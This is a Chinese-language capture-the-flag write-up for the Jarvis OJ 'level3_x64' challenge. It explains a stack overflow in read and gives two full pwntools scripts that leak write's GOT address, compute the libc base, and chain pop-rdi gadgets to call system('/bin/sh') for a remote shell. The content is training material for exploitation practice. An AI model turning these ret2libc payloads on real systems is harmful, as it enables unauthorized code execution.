pwn - level3_x64
-
检查保护机制
只开启了NX保护,堆栈不可执行保护。 -
放入ida分析,发现read栈溢出。
-
思路:没有system和binsh的情况下,在read函数前有write函数运行,可以通过泄漏write函数的地址来泄漏libc版本,从而泄漏system和binsh地址。
-
泄漏write函数,需要调用write(1,write_got,0x08)
-
需要找出rdi,rsi,rdx的地址。没有rdx的地址。
我们部署的payload是通过调用read函数的栈溢出进行利用的,首先进入主函数,执行vul函数,再输出input那句话,再执行read函数,这里的rdx是read函数的值0x200,即大于在栈中调用的write函数中的0x08,只要大于8个就可以,因为,我们只读取读入数据的前八个字节。所以,rdx里的值不需要修改。
-
脚本
from pwn import *
from LibcSearcher import LibcSearcher
r = remote("pwn2.jarvisoj.com ","9883")
write_plt = 0x00000000004004B0
write_got = 0x0000000000600A58
read_plt = 0x00000000004004C0
vul_addr = 0x00000000004005E6
pop_rdi = 0x00000000004006b3
pop_rsi_r15 = 0x00000000004006b1
payload = 'a'*0x80+'b'*0x8
payload += p64(pop_rdi)+p64(0x01)
payload += p64(pop_rsi_r15)+p64(write_got)+p64(0)
payload += p64(write_plt)+p64(vul_addr)
r.recvuntil("Input:\n")
r.sendline(payload)
write_addr = u64(r.recv(8))
print hex(write_addr)
libc = LibcSearcher('write',write_addr)
write_libc = libc.dump('write')
system_libc = libc.dump('system')
binsh_libc = libc.dump('/bin/sh')
libc_base = write_addr - write_libc
system_addr = libc_base + system_libc
binsh_addr = libc_base + binsh_libc
payload = 'a'*0x80+'b'*0x08
payload += p64(pop_rdi)+p64(binsh_addr)
payload += p64(system_addr)+p64(vul_addr)
r.recvuntil("Input:\n")
r.sendline(payload)
r.interactive()
最近Jarvis oj上的level部分的题目连接不上,无法测试自己写的脚本是否正确,等修复后再提交看看。
更新:
私聊了搭建该oj的博主,他说可以连接上,我本以为是题目问题(因为之前有两道题目确实是连接不上,博主修复后才可以),但是别人都能连接上,说明是脚本问题。
于是,又来看脚本,发现!!
仅仅是在com后边多了一个空格,就出了大错!以后就记住了。
r =remote('pwn2.jarvisoj.com ',9883)
下边附上新的解题脚本,上述脚本运行不出,在搜索libc版本时,没有找到相应版本。题目给出了libc文件。
from pwn import *
#context.log_level = "debug"
r =remote('pwn2.jarvisoj.com',9883)
e = ELF("./level3_x64")
write_plt = 0x00000000004004B0
write_got = 0x0000000000600A58
vul_addr = 0x00000000004005E6
pop_rdi = 0x00000000004006b3
pop_rsi_r15 = 0x00000000004006b1
payload = 'a'*0x80+'b'*0x8
payload += p64(pop_rdi)+p64(0x01)
payload += p64(pop_rsi_r15)+p64(write_got)+p64(0)
payload += p64(write_plt)+p64(vul_addr)
r.recvuntil("Input:\n")
r.sendline(payload)
write_addr = u64(r.recv(8))
print hex(write_addr)
libc=ELF("libc-2.19.so")
offset=write_addr-libc.symbols["write"]
sys_addr=offset+libc.symbols["system"]
bin_addr=offset+libc.search("/bin/sh").next()
payload2='a'*0x88+p64(pop_rdi)+p64(bin_addr)+p64(sys_addr)+"ret-addr"
r.recvuntil("Input:\n")
r.sendline(payload2)
r.interactive()
在得到write_got的地址等,可以用以下脚本,以防地址找错。
elf=ELF("level3_x64")
write_plt=elf.symbols["write"]
write_got=elf.got["write"]
vul_addr=elf.symbols['vulnerable_function']